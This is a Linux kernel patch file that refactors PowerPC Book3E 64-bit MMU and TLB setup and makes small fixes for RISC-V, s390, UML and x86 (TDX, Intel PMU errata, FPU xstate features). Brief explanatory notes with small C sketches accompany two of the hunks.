+-		 * reduces the memory available to Linux.  We need to
+-		 * do this because highmem is not supported on 64-bit.
+-		 */
+-		memblock_enforce_memory_limit(linear_map_top);
+-	}
+-#endif
+-
+-	memblock_set_current_limit(linear_map_top);
+-}
+-
+-/* boot cpu only */
+-void __init early_init_mmu(void)
+-{
+-	early_init_mmu_global();
+-	early_init_this_mmu();
+-	early_mmu_set_memory_limit();
+-}
+-
+-void early_init_mmu_secondary(void)
+-{
+-	early_init_this_mmu();
+-}
+-
+-void setup_initial_memory_limit(phys_addr_t first_memblock_base,
+-				phys_addr_t first_memblock_size)
+-{
+-	/* On non-FSL Embedded 64-bit, we adjust the RMA size to match
+-	 * the bolted TLB entry. We know for now that only 1G
+-	 * entries are supported though that may eventually
+-	 * change.
+-	 *
+-	 * on FSL Embedded 64-bit, usually all RAM is bolted, but with
+-	 * unusual memory sizes it's possible for some RAM to not be mapped
+-	 * (such RAM is not used at all by Linux, since we don't support
+-	 * highmem on 64-bit).  We limit ppc64_rma_size to what would be
+-	 * mappable if this memblock is the only one.  Additional memblocks
+-	 * can only increase, not decrease, the amount that ends up getting
+-	 * mapped.  We still limit max to 1G even if we'll eventually map
+-	 * more.  This is due to what the early init code is set up to do.
+-	 *
+-	 * We crop it to the size of the first MEMBLOCK to
+-	 * avoid going over total available memory just in case...
+-	 */
+-#ifdef CONFIG_PPC_E500
+-	if (early_mmu_has_feature(MMU_FTR_TYPE_FSL_E)) {
+-		unsigned long linear_sz;
+-		unsigned int num_cams;
+-
+-		/* use a quarter of the TLBCAM for bolted linear map */
+-		num_cams = (mfspr(SPRN_TLB1CFG) & TLBnCFG_N_ENTRY) / 4;
+-
+-		linear_sz = map_mem_in_cams(first_memblock_size, num_cams,
+-					    true, true);
+-
+-		ppc64_rma_size = min_t(u64, linear_sz, 0x40000000);
+-	} else
+-#endif
+-		ppc64_rma_size = min_t(u64, first_memblock_size, 0x40000000);
+-
+-	/* Finally limit subsequent allocations */
+-	memblock_set_current_limit(first_memblock_base + ppc64_rma_size);
+-}
+-#else /* ! CONFIG_PPC64 */
++#ifndef CONFIG_PPC64
+ void __init early_init_mmu(void)
+ {
+ #ifdef CONFIG_PPC_47x
+diff --git a/arch/powerpc/mm/nohash/tlb_64e.c b/arch/powerpc/mm/nohash/tlb_64e.c
+new file mode 100644
+index 0000000000000..b6af3ec4d001d
+--- /dev/null
++++ b/arch/powerpc/mm/nohash/tlb_64e.c
+@@ -0,0 +1,361 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ * Copyright 2008,2009 Ben Herrenschmidt <benh@kernel.crashing.org>
++ *                     IBM Corp.
++ *
++ *  Derived from arch/ppc/mm/init.c:
++ *    Copyright (C) 1995-1996 Gary Thomas (gdt@linuxppc.org)
++ *
++ *  Modifications by Paul Mackerras (PowerMac) (paulus@cs.anu.edu.au)
++ *  and Cort Dougan (PReP) (cort@cs.nmt.edu)
++ *    Copyright (C) 1996 Paul Mackerras
++ *
++ *  Derived from "arch/i386/mm/init.c"
++ *    Copyright (C) 1991, 1992, 1993, 1994  Linus Torvalds
++ */
++
++#include <linux/kernel.h>
++#include <linux/export.h>
++#include <linux/mm.h>
++#include <linux/init.h>
++#include <linux/pagemap.h>
++#include <linux/memblock.h>
++
++#include <asm/pgalloc.h>
++#include <asm/tlbflush.h>
++#include <asm/tlb.h>
++#include <asm/code-patching.h>
++#include <asm/cputhreads.h>
++
++#include <mm/mmu_decl.h>
++
++/* The variables below are currently only used on 64-bit Book3E
++ * though this will probably be made common with other nohash
++ * implementations at some point
++ */
++static int mmu_pte_psize;	/* Page size used for PTE pages */
++int mmu_vmemmap_psize;		/* Page size used for the virtual mem map */
++int book3e_htw_mode;		/* HW tablewalk?  Value is PPC_HTW_* */
++unsigned long linear_map_top;	/* Top of linear mapping */
++
++
++/*
++ * Number of bytes to add to SPRN_SPRG_TLB_EXFRAME on crit/mcheck/debug
++ * exceptions.  This is used for bolted and e6500 TLB miss handlers which
++ * do not modify this SPRG in the TLB miss code; for other TLB miss handlers,
++ * this is set to zero.
++ */
++int extlb_level_exc;
++
++/*
++ * Handling of virtual linear page tables or indirect TLB entries
++ * flushing when PTE pages are freed
++ */
++void tlb_flush_pgtable(struct mmu_gather *tlb, unsigned long address)
++{
++	int tsize = mmu_psize_defs[mmu_pte_psize].enc;
++
++	if (book3e_htw_mode != PPC_HTW_NONE) {
++		unsigned long start = address & PMD_MASK;
++		unsigned long end = address + PMD_SIZE;
++		unsigned long size = 1UL << mmu_psize_defs[mmu_pte_psize].shift;
++
++		/* This isn't the most optimal, ideally we would factor out the
++		 * while preempt & CPU mask mucking around, or even the IPI but
++		 * it will do for now
++		 */
++		while (start < end) {
++			__flush_tlb_page(tlb->mm, start, tsize, 1);
++			start += size;
++		}
++	} else {
++		unsigned long rmask = 0xf000000000000000ul;
++		unsigned long rid = (address & rmask) | 0x1000000000000000ul;
++		unsigned long vpte = address & ~rmask;
++
++		vpte = (vpte >> (PAGE_SHIFT - 3)) & ~0xffful;
++		vpte |= rid;
++		__flush_tlb_page(tlb->mm, vpte, tsize, 0);
++	}
++}
++
++static void __init setup_page_sizes(void)
++{
++	unsigned int tlb0cfg;
++	unsigned int eptcfg;
++	int psize;
++
++#ifdef CONFIG_PPC_E500
++	unsigned int mmucfg = mfspr(SPRN_MMUCFG);
++	int fsl_mmu = mmu_has_feature(MMU_FTR_TYPE_FSL_E);
++
++	if (fsl_mmu && (mmucfg & MMUCFG_MAVN) == MMUCFG_MAVN_V1) {
++		unsigned int tlb1cfg = mfspr(SPRN_TLB1CFG);
++		unsigned int min_pg, max_pg;
++
++		min_pg = (tlb1cfg & TLBnCFG_MINSIZE) >> TLBnCFG_MINSIZE_SHIFT;
++		max_pg = (tlb1cfg & TLBnCFG_MAXSIZE) >> TLBnCFG_MAXSIZE_SHIFT;
++
++		for (psize = 0; psize < MMU_PAGE_COUNT; ++psize) {
++			struct mmu_psize_def *def;
++			unsigned int shift;
++
++			def = &mmu_psize_defs[psize];
++			shift = def->shift;
++
++			if (shift == 0 || shift & 1)
++				continue;
++
++			/* adjust to be in terms of 4^shift Kb */
++			shift = (shift - 10) >> 1;
++
++			if ((shift >= min_pg) && (shift <= max_pg))
++				def->flags |= MMU_PAGE_SIZE_DIRECT;
++		}
++
++		goto out;
++	}
++
++	if (fsl_mmu && (mmucfg & MMUCFG_MAVN) == MMUCFG_MAVN_V2) {
++		u32 tlb1cfg, tlb1ps;
++
++		tlb0cfg = mfspr(SPRN_TLB0CFG);
++		tlb1cfg = mfspr(SPRN_TLB1CFG);
++		tlb1ps = mfspr(SPRN_TLB1PS);
++		eptcfg = mfspr(SPRN_EPTCFG);
++
++		if ((tlb1cfg & TLBnCFG_IND) && (tlb0cfg & TLBnCFG_PT))
++			book3e_htw_mode = PPC_HTW_E6500;
++
++		/*
++		 * We expect 4K subpage size and unrestricted indirect size.
++		 * The lack of a restriction on indirect size is a Freescale
++		 * extension, indicated by PSn = 0 but SPSn != 0.
++		 */
++		if (eptcfg != 2)
++			book3e_htw_mode = PPC_HTW_NONE;
++
++		for (psize = 0; psize < MMU_PAGE_COUNT; ++psize) {
++			struct mmu_psize_def *def = &mmu_psize_defs[psize];
++
++			if (!def->shift)
++				continue;
++
++			if (tlb1ps & (1U << (def->shift - 10))) {
++				def->flags |= MMU_PAGE_SIZE_DIRECT;
++
++				if (book3e_htw_mode && psize == MMU_PAGE_2M)
++					def->flags |= MMU_PAGE_SIZE_INDIRECT;
++			}
++		}
++
++		goto out;
++	}
++#endif
++out:
++	/* Cleanup array and print summary */
++	pr_info("MMU: Supported page sizes\n");
++	for (psize = 0; psize < MMU_PAGE_COUNT; ++psize) {
++		struct mmu_psize_def *def = &mmu_psize_defs[psize];
++		const char *__page_type_names[] = {
++			"unsupported",
++			"direct",
++			"indirect",
++			"direct & indirect"
++		};
++		if (def->flags == 0) {
++			def->shift = 0;
++			continue;
++		}
++		pr_info("  %8ld KB as %s\n", 1ul << (def->shift - 10),
++			__page_type_names[def->flags & 0x3]);
++	}
++}
++
++static void __init setup_mmu_htw(void)
++{
++	/*
++	 * If we want to use HW tablewalk, enable it by patching the TLB miss
++	 * handlers to branch to the one dedicated to it.
++	 */
++
++	switch (book3e_htw_mode) {
++#ifdef CONFIG_PPC_E500
++	case PPC_HTW_E6500:
++		extlb_level_exc = EX_TLB_SIZE;
++		patch_exception(0x1c0, exc_data_tlb_miss_e6500_book3e);
++		patch_exception(0x1e0, exc_instruction_tlb_miss_e6500_book3e);
++		break;
++#endif
++	}
++	pr_info("MMU: Book3E HW tablewalk %s\n",
++		book3e_htw_mode != PPC_HTW_NONE ? "enabled" : "not supported");
++}
++
++/*
++ * Early initialization of the MMU TLB code
++ */
++static void early_init_this_mmu(void)
++{
++	unsigned int mas4;
++
++	/* Set MAS4 based on page table setting */
++
++	mas4 = 0x4 << MAS4_WIMGED_SHIFT;
++	switch (book3e_htw_mode) {
++	case PPC_HTW_E6500:
++		mas4 |= MAS4_INDD;
++		mas4 |= BOOK3E_PAGESZ_2M << MAS4_TSIZED_SHIFT;
++		mas4 |= MAS4_TLBSELD(1);
++		mmu_pte_psize = MMU_PAGE_2M;
++		break;
++
++	case PPC_HTW_NONE:
++		mas4 |=	BOOK3E_PAGESZ_4K << MAS4_TSIZED_SHIFT;
++		mmu_pte_psize = mmu_virtual_psize;
++		break;
++	}
++	mtspr(SPRN_MAS4, mas4);
++
++#ifdef CONFIG_PPC_E500
++	if (mmu_has_feature(MMU_FTR_TYPE_FSL_E)) {
++		unsigned int num_cams;
++		bool map = true;
++
++		/* use a quarter of the TLBCAM for bolted linear map */
++		num_cams = (mfspr(SPRN_TLB1CFG) & TLBnCFG_N_ENTRY) / 4;
++
++		/*
++		 * Only do the mapping once per core, or else the
++		 * transient mapping would cause problems.
++		 */
++#ifdef CONFIG_SMP
++		if (hweight32(get_tensr()) > 1)
++			map = false;
++#endif
++
++		if (map)
++			linear_map_top = map_mem_in_cams(linear_map_top,
++							 num_cams, false, true);
++	}
++#endif
++
++	/* A sync won't hurt us after mucking around with
++	 * the MMU configuration
++	 */
++	mb();
++}
++
++static void __init early_init_mmu_global(void)
++{
++	/* XXX This should be decided at runtime based on supported
++	 * page sizes in the TLB, but for now let's assume 16M is
++	 * always there and a good fit (which it probably is)
++	 *
++	 * Freescale booke only supports 4K pages in TLB0, so use that.
++	 */
++	if (mmu_has_feature(MMU_FTR_TYPE_FSL_E))
++		mmu_vmemmap_psize = MMU_PAGE_4K;
++	else
++		mmu_vmemmap_psize = MMU_PAGE_16M;
++
++	/* XXX This code only checks for TLB 0 capabilities and doesn't
++	 *     check what page size combos are supported by the HW. It
++	 *     also doesn't handle the case where a separate array holds
++	 *     the IND entries from the array loaded by the PT.
++	 */
++	/* Look for supported page sizes */
++	setup_page_sizes();
++
++	/* Look for HW tablewalk support */
++	setup_mmu_htw();
++
++#ifdef CONFIG_PPC_E500
++	if (mmu_has_feature(MMU_FTR_TYPE_FSL_E)) {
++		if (book3e_htw_mode == PPC_HTW_NONE) {
++			extlb_level_exc = EX_TLB_SIZE;
++			patch_exception(0x1c0, exc_data_tlb_miss_bolted_book3e);
++			patch_exception(0x1e0,
++				exc_instruction_tlb_miss_bolted_book3e);
++		}
++	}
++#endif
++
++	/* Set the global containing the top of the linear mapping
++	 * for use by the TLB miss code
++	 */
++	linear_map_top = memblock_end_of_DRAM();
++
++	ioremap_bot = IOREMAP_BASE;
++}
++
++static void __init early_mmu_set_memory_limit(void)
++{
++#ifdef CONFIG_PPC_E500
++	if (mmu_has_feature(MMU_FTR_TYPE_FSL_E)) {
++		/*
++		 * Limit memory so we dont have linear faults.
++		 * Unlike memblock_set_current_limit, which limits
++		 * memory available during early boot, this permanently
++		 * reduces the memory available to Linux.  We need to
++		 * do this because highmem is not supported on 64-bit.
++		 */
++		memblock_enforce_memory_limit(linear_map_top);
++	}
++#endif
++
++	memblock_set_current_limit(linear_map_top);
++}
++
++/* boot cpu only */
++void __init early_init_mmu(void)
++{
++	early_init_mmu_global();
++	early_init_this_mmu();
++	early_mmu_set_memory_limit();
++}
++
++void early_init_mmu_secondary(void)
++{
++	early_init_this_mmu();
++}
++
++void setup_initial_memory_limit(phys_addr_t first_memblock_base,
++				phys_addr_t first_memblock_size)
++{
++	/* On non-FSL Embedded 64-bit, we adjust the RMA size to match
++	 * the bolted TLB entry. We know for now that only 1G
++	 * entries are supported though that may eventually
++	 * change.
++	 *
++	 * on FSL Embedded 64-bit, usually all RAM is bolted, but with
++	 * unusual memory sizes it's possible for some RAM to not be mapped
++	 * (such RAM is not used at all by Linux, since we don't support
++	 * highmem on 64-bit).  We limit ppc64_rma_size to what would be
++	 * mappable if this memblock is the only one.  Additional memblocks
++	 * can only increase, not decrease, the amount that ends up getting
++	 * mapped.  We still limit max to 1G even if we'll eventually map
++	 * more.  This is due to what the early init code is set up to do.
++	 *
++	 * We crop it to the size of the first MEMBLOCK to
++	 * avoid going over total available memory just in case...
++	 */
++#ifdef CONFIG_PPC_E500
++	if (early_mmu_has_feature(MMU_FTR_TYPE_FSL_E)) {
++		unsigned long linear_sz;
++		unsigned int num_cams;
++
++		/* use a quarter of the TLBCAM for bolted linear map */
++		num_cams = (mfspr(SPRN_TLB1CFG) & TLBnCFG_N_ENTRY) / 4;
++
++		linear_sz = map_mem_in_cams(first_memblock_size, num_cams,
++					    true, true);
++
++		ppc64_rma_size = min_t(u64, linear_sz, 0x40000000);
++	} else
++#endif
++		ppc64_rma_size = min_t(u64, first_memblock_size, 0x40000000);
++
++	/* Finally limit subsequent allocations */
++	memblock_set_current_limit(first_memblock_base + ppc64_rma_size);
++}
+diff --git a/arch/powerpc/mm/nohash/tlb_low_64e.S b/arch/powerpc/mm/nohash/tlb_low_64e.S
+index 76cf456d79762..d831a111eaba6 100644
+--- a/arch/powerpc/mm/nohash/tlb_low_64e.S
++++ b/arch/powerpc/mm/nohash/tlb_low_64e.S
+@@ -893,201 +893,6 @@ virt_page_table_tlb_miss_whacko_fault:
+ 	TLB_MISS_EPILOG_ERROR
+ 	b	exc_data_storage_book3e
+ 
+-
+-/**************************************************************
+- *                                                            *
+- * TLB miss handling for Book3E with hw page table support    *
+- *                                                            *
+- **************************************************************/
+-
+-
+-/* Data TLB miss */
+-	START_EXCEPTION(data_tlb_miss_htw)
+-	TLB_MISS_PROLOG
+-
+-	/* Now we handle the fault proper. We only save DEAR in normal
+-	 * fault case since that's the only interesting values here.
+-	 * We could probably also optimize by not saving SRR0/1 in the
+-	 * linear mapping case but I'll leave that for later
+-	 */
+-	mfspr	r14,SPRN_ESR
+-	mfspr	r16,SPRN_DEAR		/* get faulting address */
+-	srdi	r11,r16,44		/* get region */
+-	xoris	r11,r11,0xc
+-	cmpldi	cr0,r11,0		/* linear mapping ? */
+-	beq	tlb_load_linear		/* yes -> go to linear map load */
+-	cmpldi	cr1,r11,1		/* vmalloc mapping ? */
+-
+-	/* We do the user/kernel test for the PID here along with the RW test
+-	 */
+-	srdi.	r11,r16,60		/* Check for user region */
+-	ld	r15,PACAPGD(r13)	/* Load user pgdir */
+-	beq	htw_tlb_miss
+-
+-	/* XXX replace the RMW cycles with immediate loads + writes */
+-1:	mfspr	r10,SPRN_MAS1
+-	rlwinm	r10,r10,0,16,1		/* Clear TID */
+-	mtspr	SPRN_MAS1,r10
+-	ld	r15,PACA_KERNELPGD(r13)	/* Load kernel pgdir */
+-	beq+	cr1,htw_tlb_miss
+-
+-	/* We got a crappy address, just fault with whatever DEAR and ESR
+-	 * are here
+-	 */
+-	TLB_MISS_EPILOG_ERROR
+-	b	exc_data_storage_book3e
+-
+-/* Instruction TLB miss */
+-	START_EXCEPTION(instruction_tlb_miss_htw)
+-	TLB_MISS_PROLOG
+-
+-	/* If we take a recursive fault, the second level handler may need
+-	 * to know whether we are handling a data or instruction fault in
+-	 * order to get to the right store fault handler. We provide that
+-	 * info by keeping a crazy value for ESR in r14
+-	 */
+-	li	r14,-1	/* store to exception frame is done later */
+-
+-	/* Now we handle the fault proper. We only save DEAR in the non
+-	 * linear mapping case since we know the linear mapping case will
+-	 * not re-enter. We could indeed optimize and also not save SRR0/1
+-	 * in the linear mapping case but I'll leave that for later
+-	 *
+-	 * Faulting address is SRR0 which is already in r16
+-	 */
+-	srdi	r11,r16,44		/* get region */
+-	xoris	r11,r11,0xc
+-	cmpldi	cr0,r11,0		/* linear mapping ? */
+-	beq	tlb_load_linear		/* yes -> go to linear map load */
+-	cmpldi	cr1,r11,1		/* vmalloc mapping ? */
+-
+-	/* We do the user/kernel test for the PID here along with the RW test
+-	 */
+-	srdi.	r11,r16,60		/* Check for user region */
+-	ld	r15,PACAPGD(r13)		/* Load user pgdir */
+-	beq	htw_tlb_miss
+-
+-	/* XXX replace the RMW cycles with immediate loads + writes */
+-1:	mfspr	r10,SPRN_MAS1
+-	rlwinm	r10,r10,0,16,1			/* Clear TID */
+-	mtspr	SPRN_MAS1,r10
+-	ld	r15,PACA_KERNELPGD(r13)		/* Load kernel pgdir */
+-	beq+	htw_tlb_miss
+-
+-	/* We got a crappy address, just fault */
+-	TLB_MISS_EPILOG_ERROR
+-	b	exc_instruction_storage_book3e
+-
+-
+-/*
+- * This is the guts of the second-level TLB miss handler for direct
+- * misses. We are entered with:
+- *
+- * r16 = virtual page table faulting address
+- * r15 = PGD pointer
+- * r14 = ESR
+- * r13 = PACA
+- * r12 = TLB exception frame in PACA
+- * r11 = crap (free to use)
+- * r10 = crap (free to use)
+- *
+- * It can be re-entered by the linear mapping miss handler. However, to
+- * avoid too much complication, it will save/restore things for us
+- */
+-htw_tlb_miss:
+-#ifdef CONFIG_PPC_KUAP
+-	mfspr	r10,SPRN_MAS1
+-	rlwinm.	r10,r10,0,0x3fff0000
+-	beq-	htw_tlb_miss_fault /* KUAP fault */
+-#endif
+-	/* Search if we already have a TLB entry for that virtual address, and
+-	 * if we do, bail out.
+-	 *
+-	 * MAS1:IND should be already set based on MAS4
+-	 */
+-	PPC_TLBSRX_DOT(0,R16)
+-	beq	htw_tlb_miss_done
+-
+-	/* Now, we need to walk the page tables. First check if we are in
+-	 * range.
+-	 */
+-	rldicl.	r10,r16,64-PGTABLE_EADDR_SIZE,PGTABLE_EADDR_SIZE+4
+-	bne-	htw_tlb_miss_fault
+-
+-	/* Get the PGD pointer */
+-	cmpldi	cr0,r15,0
+-	beq-	htw_tlb_miss_fault
+-
+-	/* Get to PGD entry */
+-	rldicl	r11,r16,64-(PGDIR_SHIFT-3),64-PGD_INDEX_SIZE-3
+-	clrrdi	r10,r11,3
+-	ldx	r15,r10,r15
+-	cmpdi	cr0,r15,0
+-	bge	htw_tlb_miss_fault
+-
+-	/* Get to PUD entry */
+-	rldicl	r11,r16,64-(PUD_SHIFT-3),64-PUD_INDEX_SIZE-3
+-	clrrdi	r10,r11,3
+-	ldx	r15,r10,r15
+-	cmpdi	cr0,r15,0
+-	bge	htw_tlb_miss_fault
+-
+-	/* Get to PMD entry */
+-	rldicl	r11,r16,64-(PMD_SHIFT-3),64-PMD_INDEX_SIZE-3
+-	clrrdi	r10,r11,3
+-	ldx	r15,r10,r15
+-	cmpdi	cr0,r15,0
+-	bge	htw_tlb_miss_fault
+-
+-	/* Ok, we're all right, we can now create an indirect entry for
+-	 * a 1M or 256M page.
+-	 *
+-	 * The last trick is now that because we use "half" pages for
+-	 * the HTW (1M IND is 2K and 256M IND is 32K) we need to account
+-	 * for an added LSB bit to the RPN. For 64K pages, there is no
+-	 * problem as we already use 32K arrays (half PTE pages), but for
+-	 * 4K page we need to extract a bit from the virtual address and
+-	 * insert it into the "PA52" bit of the RPN.
+-	 */
+-	rlwimi	r15,r16,32-9,20,20
+-	/* Now we build the MAS:
+-	 *
+-	 * MAS 0   :	Fully setup with defaults in MAS4 and TLBnCFG
+-	 * MAS 1   :	Almost fully setup
+-	 *               - PID already updated by caller if necessary
+-	 *               - TSIZE for now is base ind page size always
+-	 * MAS 2   :	Use defaults
+-	 * MAS 3+7 :	Needs to be done
+-	 */
+-	ori	r10,r15,(BOOK3E_PAGESZ_4K << MAS3_SPSIZE_SHIFT)
+-
+-	srdi	r16,r10,32
+-	mtspr	SPRN_MAS3,r10
+-	mtspr	SPRN_MAS7,r16
+-
+-	tlbwe
+-
+-htw_tlb_miss_done:
+-	/* We don't bother with restoring DEAR or ESR since we know we are
+-	 * level 0 and just going back to userland. They are only needed
+-	 * if you are going to take an access fault
+-	 */
+-	TLB_MISS_EPILOG_SUCCESS
+-	rfi
+-
+-htw_tlb_miss_fault:
+-	/* We need to check if it was an instruction miss. We know this
+-	 * though because r14 would contain -1
+-	 */
+-	cmpdi	cr0,r14,-1
+-	beq	1f
+-	mtspr	SPRN_DEAR,r16
+-	mtspr	SPRN_ESR,r14
+-	TLB_MISS_EPILOG_ERROR
+-	b	exc_data_storage_book3e
+-1:	TLB_MISS_EPILOG_ERROR
+-	b	exc_instruction_storage_book3e
+-
+ /*
+  * This is the guts of "any" level TLB miss handler for kernel linear
+  * mapping misses. We are entered with:
+diff --git a/arch/riscv/kernel/head.S b/arch/riscv/kernel/head.S
+index 4bf6c449d78b6..1a017ad53343c 100644
+--- a/arch/riscv/kernel/head.S
++++ b/arch/riscv/kernel/head.S
+@@ -307,6 +307,9 @@ clear_bss_done:
+ #else
+ 	mv a0, s1
+ #endif /* CONFIG_BUILTIN_DTB */
++	/* Set trap vector to spin forever to help debug */
++	la a3, .Lsecondary_park
++	csrw CSR_TVEC, a3
+ 	call setup_vm
+ #ifdef CONFIG_MMU
+ 	la a0, early_pg_dir
+diff --git a/arch/s390/kernel/vmlinux.lds.S b/arch/s390/kernel/vmlinux.lds.S
+index 729d4f949cfe8..52d6e5d1b4532 100644
+--- a/arch/s390/kernel/vmlinux.lds.S
++++ b/arch/s390/kernel/vmlinux.lds.S
+@@ -71,6 +71,15 @@ SECTIONS
+ 	. = ALIGN(PAGE_SIZE);
+ 	__end_ro_after_init = .;
+ 
++	.data.rel.ro : {
++		*(.data.rel.ro .data.rel.ro.*)
++	}
++	.got : {
++		__got_start = .;
++		*(.got)
++		__got_end = .;
++	}
++
+ 	RW_DATA(0x100, PAGE_SIZE, THREAD_SIZE)
+ 	BOOT_DATA_PRESERVED
+ 
+diff --git a/arch/um/drivers/line.c b/arch/um/drivers/line.c
+index 95ad6b190d1d1..6b4faca401ea1 100644
+--- a/arch/um/drivers/line.c
++++ b/arch/um/drivers/line.c
+@@ -383,6 +383,7 @@ int setup_one_line(struct line *lines, int n, char *init,
+ 			parse_chan_pair(NULL, line, n, opts, error_out);
+ 			err = 0;
+ 		}
++		*error_out = "configured as 'none'";
+ 	} else {
+ 		char *new = kstrdup(init, GFP_KERNEL);
+ 		if (!new) {
+@@ -406,6 +407,7 @@ int setup_one_line(struct line *lines, int n, char *init,
+ 			}
+ 		}
+ 		if (err) {
++			*error_out = "failed to parse channel pair";
+ 			line->init_str = NULL;
+ 			line->valid = 0;
+ 			kfree(new);
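
The um/line.c hunks make sure *error_out is filled in on every failure path, so callers never report a stale or NULL message. A sketch of the out-parameter convention (the messages echo the patch; everything else is invented):

#include <stdio.h>

/* Every failure path sets *error_out before returning, so the caller
 * always has a reason to report. */
static int setup_line(const char *init, const char **error_out)
{
        if (!init) {
                *error_out = "configured as 'none'";
                return -1;
        }
        if (init[0] != '/') {
                *error_out = "failed to parse channel pair";
                return -1;
        }
        return 0;
}

int main(void)
{
        const char *err = NULL;

        if (setup_line("bogus", &err))
                printf("setup failed: %s\n", err);
        return 0;
}
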
+diff --git a/arch/x86/coco/tdx/tdx.c b/arch/x86/coco/tdx/tdx.c
+index 4692450aeb4d3..b9da467bd2228 100644
+--- a/arch/x86/coco/tdx/tdx.c
++++ b/arch/x86/coco/tdx/tdx.c
+@@ -328,7 +328,6 @@ static bool mmio_read(int size, unsigned long addr, unsigned long *val)
+ 		.r12 = size,
+ 		.r13 = EPT_READ,
+ 		.r14 = addr,
+-		.r15 = *val,
+ 	};
+ 
+ 	if (__tdx_hypercall(&args, TDX_HCALL_HAS_OUTPUT))
+diff --git a/arch/x86/events/intel/core.c b/arch/x86/events/intel/core.c
+index 949129443b1c0..27968d10dd0b4 100644
+--- a/arch/x86/events/intel/core.c
++++ b/arch/x86/events/intel/core.c
+@@ -4352,6 +4352,25 @@ static u8 adl_get_hybrid_cpu_type(void)
+ 	return hybrid_big;
+ }
+ 
++static inline bool erratum_hsw11(struct perf_event *event)
++{
++	return (event->hw.config & INTEL_ARCH_EVENT_MASK) ==
++		X86_CONFIG(.event=0xc0, .umask=0x01);
++}
++
++/*
++ * The HSW11 requires a period larger than 100 which is the same as the BDM11.
++ * A minimum period of 128 is enforced as well for the INST_RETIRED.ALL.
++ *
++ * The message 'interrupt took too long' can be observed on any counter which
++ * was armed with a period < 32 and two events expired in the same NMI.
++ * A minimum period of 32 is enforced for the rest of the events.
++ */
++static void hsw_limit_period(struct perf_event *event, s64 *left)
++{
++	*left = max(*left, erratum_hsw11(event) ? 128 : 32);
++}
++
+ /*
+  * Broadwell:
+  *
+@@ -4369,8 +4388,7 @@ static u8 adl_get_hybrid_cpu_type(void)
+  */
+ static void bdw_limit_period(struct perf_event *event, s64 *left)
+ {
+-	if ((event->hw.config & INTEL_ARCH_EVENT_MASK) ==
+-			X86_CONFIG(.event=0xc0, .umask=0x01)) {
++	if (erratum_hsw11(event)) {
+ 		if (*left < 128)
+ 			*left = 128;
+ 		*left &= ~0x3fULL;
+@@ -6180,6 +6198,7 @@ __init int intel_pmu_init(void)
+ 
+ 		x86_pmu.hw_config = hsw_hw_config;
+ 		x86_pmu.get_event_constraints = hsw_get_event_constraints;
++		x86_pmu.limit_period = hsw_limit_period;
+ 		x86_pmu.lbr_double_abort = true;
+ 		extra_attr = boot_cpu_has(X86_FEATURE_RTM) ?
+ 			hsw_format_attr : nhm_format_attr;
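
The new hsw_limit_period() enforces per-erratum floors on the sampling period: 128 for the INST_RETIRED.ALL encoding shared with the BDM11 erratum, 32 for everything else. The clamp itself is one line; a standalone sketch:

#include <stdio.h>

typedef long long s64;

static s64 max64(s64 a, s64 b) { return a > b ? a : b; }

/* Clamp the sampling period to an erratum-specific floor, the same
 * policy hsw_limit_period() installs above. */
static void limit_period(int is_inst_retired_all, s64 *left)
{
        *left = max64(*left, is_inst_retired_all ? 128 : 32);
}

int main(void)
{
        s64 a = 5, b = 5, c = 200;

        limit_period(1, &a);    /* INST_RETIRED.ALL -> 128 */
        limit_period(0, &b);    /* other event      -> 32  */
        limit_period(0, &c);    /* already large    -> unchanged */
        printf("%lld %lld %lld\n", a, b, c);
        return 0;
}
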
+diff --git a/arch/x86/include/asm/fpu/types.h b/arch/x86/include/asm/fpu/types.h
+index eb7cd1139d978..b85af124f8999 100644
+--- a/arch/x86/include/asm/fpu/types.h
++++ b/arch/x86/include/asm/fpu/types.h
+@@ -577,6 +577,13 @@ struct fpu_state_config {
+ 	 * even without XSAVE support, i.e. legacy features FP + SSE
+ 	 */
+ 	u64 legacy_features;
++	/*
++	 * @independent_features:
++	 *
++	 * Features that are supported by XSAVES, but not managed as part of
++	 * the FPU core, such as LBR
++	 */
++	u64 independent_features;
+ };
+ 
+ /* FPU state configuration information */
+diff --git a/arch/x86/include/asm/page_64.h b/arch/x86/include/asm/page_64.h
+index 198e03e59ca19..554af02a05262 100644
+--- a/arch/x86/include/asm/page_64.h
++++ b/arch/x86/include/asm/page_64.h
+@@ -17,6 +17,7 @@ extern unsigned long phys_base;
+ extern unsigned long page_offset_base;
+ extern unsigned long vmalloc_base;
+ extern unsigned long vmemmap_base;
++extern unsigned long physmem_end;
+ 
+ static __always_inline unsigned long __phys_addr_nodebug(unsigned long x)
+ {
+diff --git a/arch/x86/include/asm/pgtable_64_types.h b/arch/x86/include/asm/pgtable_64_types.h
+index 04f36063ad546..6c7f7c526450a 100644
+--- a/arch/x86/include/asm/pgtable_64_types.h
++++ b/arch/x86/include/asm/pgtable_64_types.h
+@@ -139,6 +139,10 @@ extern unsigned int ptrs_per_p4d;
+ # define VMEMMAP_START		__VMEMMAP_BASE_L4
+ #endif /* CONFIG_DYNAMIC_MEMORY_LAYOUT */
+ 
++#ifdef CONFIG_RANDOMIZE_MEMORY
++# define PHYSMEM_END		physmem_end
++#endif
++
+ /*
+  * End of the region for which vmalloc page tables are pre-allocated.
+  * For non-KMSAN builds, this is the same as VMALLOC_END.
+diff --git a/arch/x86/kernel/fpu/xstate.c b/arch/x86/kernel/fpu/xstate.c
+index 2aa849705bb68..d185943437453 100644
+--- a/arch/x86/kernel/fpu/xstate.c
++++ b/arch/x86/kernel/fpu/xstate.c
+@@ -792,6 +792,9 @@ void __init fpu__init_system_xstate(unsigned int legacy_size)
+ 		goto out_disable;
+ 	}
+ 
++	fpu_kernel_cfg.independent_features = fpu_kernel_cfg.max_features &
++					      XFEATURE_MASK_INDEPENDENT;
++
+ 	/*
+ 	 * Clear XSAVE features that are disabled in the normal CPUID.
+ 	 */
+diff --git a/arch/x86/kernel/fpu/xstate.h b/arch/x86/kernel/fpu/xstate.h
+index 19ca623ffa2ac..544224611e23c 100644
+--- a/arch/x86/kernel/fpu/xstate.h
++++ b/arch/x86/kernel/fpu/xstate.h
+@@ -64,9 +64,9 @@ static inline u64 xfeatures_mask_supervisor(void)
+ static inline u64 xfeatures_mask_independent(void)
+ {
+ 	if (!cpu_feature_enabled(X86_FEATURE_ARCH_LBR))
+-		return XFEATURE_MASK_INDEPENDENT & ~XFEATURE_MASK_LBR;
++		return fpu_kernel_cfg.independent_features & ~XFEATURE_MASK_LBR;
+ 
+-	return XFEATURE_MASK_INDEPENDENT;
++	return fpu_kernel_cfg.independent_features;
+ }
+ 
+ /* XSAVE/XRSTOR wrapper functions */
